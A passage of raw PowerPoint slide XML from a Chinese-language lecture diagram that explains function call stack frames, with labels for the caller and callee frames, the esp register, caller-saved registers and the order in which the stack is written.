            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="900" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="269" name="文本框 268">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DD787F5-5CDA-4C83-AFBE-AEC1F51EE67B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6029372" y="160962"/>
            <a:ext cx="1396949" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>caller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>栈帧基地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="270" name="Shape 634">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F99DBE25-4B50-41F0-B25C-4F6FDADE7873}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="68101" y="89980"/>
            <a:ext cx="7685" cy="6611930"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="accent5"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent5"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent5"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="文本框 71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{867AD47C-05D7-4088-825F-ECF6294B5628}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="82869" y="6483028"/>
            <a:ext cx="3296144" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>从下往上写入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>低地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>——&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>高地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="546" name="直接箭头连接符 545">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7F22FE3-86DA-48C8-AF68-7E420E5CBE3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7729627" y="2617365"/>
            <a:ext cx="592255"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53" name="直接箭头连接符 552">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B32B8A50-A3D9-4DAE-A61E-E069B89D3DF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6430267" y="4463192"/>
            <a:ext cx="0" cy="52312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56" name="直接箭头连接符 555">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABD98488-884C-4E7C-A0DB-22986F2CC16C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7694649" y="5013601"/>
            <a:ext cx="638811"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573" name="文本框 572">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBF9CBDA-0C74-41A7-9943-31D412154B10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6196698" y="6096898"/>
            <a:ext cx="547347" cy="262254"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>赋值</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="576" name="文本框 575">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F42DCCC-D80F-4827-AB88-8846F761856D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11857055" y="348050"/>
            <a:ext cx="446878" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>示例代码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="577" name="文本框 576">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20BF7038-3A5E-4026-A144-4585230F0A6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7142097" y="218355"/>
            <a:ext cx="1856695" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>每次调用都会为调用部分新建一个栈帧，每个栈帧都是整个函数调用栈的一部分</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" b="1" i="1" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="组合 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70E03FC7-669A-4A16-89D1-425E7D5BBC12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6024611" y="1738619"/>
            <a:ext cx="1865122" cy="609831"/>
            <a:chOff x="6024611" y="1738619"/>
            <a:chExt cx="1865122" cy="609831"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86" name="Shape 631">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B51DC8CE-E663-4E9D-8829-1B67B5783E28}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7240059" y="2119850"/>
              <a:ext cx="649674" cy="228600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent5">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400" b="1" dirty="0"/>
                <a:t>esp</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="579" name="文本框 578">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3527C3E5-0D8F-46E1-947D-E18A3D8AE6E4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6024611" y="1738619"/>
              <a:ext cx="1219643" cy="230832"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Callee stack frame</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="593" name="直接箭头连接符 592">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DC5A512-18EC-4E56-BD77-89C739AC1891}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10777184" y="1553030"/>
            <a:ext cx="0" cy="1036408"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent3">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595" name="矩形 594">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53641D76-78D2-415C-AA85-63D6EDB26A38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="11626030" y="2760786"/>
            <a:ext cx="372282" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2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1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2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597" name="矩形 596">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F243B4A-6AF8-4C2F-89D7-FD9A4A8A7073}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7613648" y="2755775"/>
            <a:ext cx="393301" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2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598" name="矩形 597">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8390F985-C776-4C92-A168-25D539C2F714}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="11626030" y="5456246"/>
            <a:ext cx="372282" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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4</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2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601" name="矩形 600">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D119C85-B998-4940-9C20-CC5C582B96AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7553316" y="5477302"/>
            <a:ext cx="372282" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2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3</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2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34" name="Shape 649">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96C0ADE1-3154-4036-ACA1-8BE3EC9AAEB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581697" y="361600"/>
            <a:ext cx="2344004" cy="504861"/>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t>calle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0"/>
              <a:t> saved registers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="700" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="700" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>用于保存不需要在各个调用之间保留的临时数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="700" b="1" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="-apple-system"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="700" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="700" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>如果要在过程调用后恢复该值，则调用方有责任将这些寄存器压入堆栈或将其复制到其他位置</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="700" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="604" name="矩形 603">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8310EA5B-C922-44EC-A2E4-427FEA6771E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9516386" y="1966017"/>
            <a:ext cx="2564374" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="20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highlight>
                  <a:srgbClr val="FF00FF"/>
                </a:highlight>
              </a:rPr>
              <a:t>调用过程图示</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" cap="none" spc="0"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highlight>
                <a:srgbClr val="FF00FF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="268" name="Shape 656">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{542B8868-91C4-43DB-A6C1-63CD4E6EAAE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5834765" y="359398"/>
            <a:ext cx="1300792" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="直接箭头连接符 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E10D5965-0869-461E-8EF9-7FDDEB7A22B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5817668" y="1388006"/>
            <a:ext cx="0" cy="2733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4" name="直接箭头连接符 343">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{701B74FA-DDF8-4BB2-8CBD-106BD4BD38D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5817668" y="1127908"/>
            <a:ext cx="0" cy="2733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0" name="直接箭头连接符 349">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{602ED852-835C-46D0-BE94-7E8535B3D69B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5817668" y="69498"/>
            <a:ext cx="0" cy="2899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95" name="文本框 394">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F31369F9-E85D-474E-BF12-80F4BC56A78D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5449321" y="86394"/>
            <a:ext cx="535126" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>(1WL)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="397" name="文本框 396">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9293140-6FD7-42CF-992A-A35B3E324DD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5452179" y="1092009"/>
            <a:ext cx="535126" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>(1WL)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="398" name="文本框 397">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E45FA80-B428-4EF6-B9EB-779604007C62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
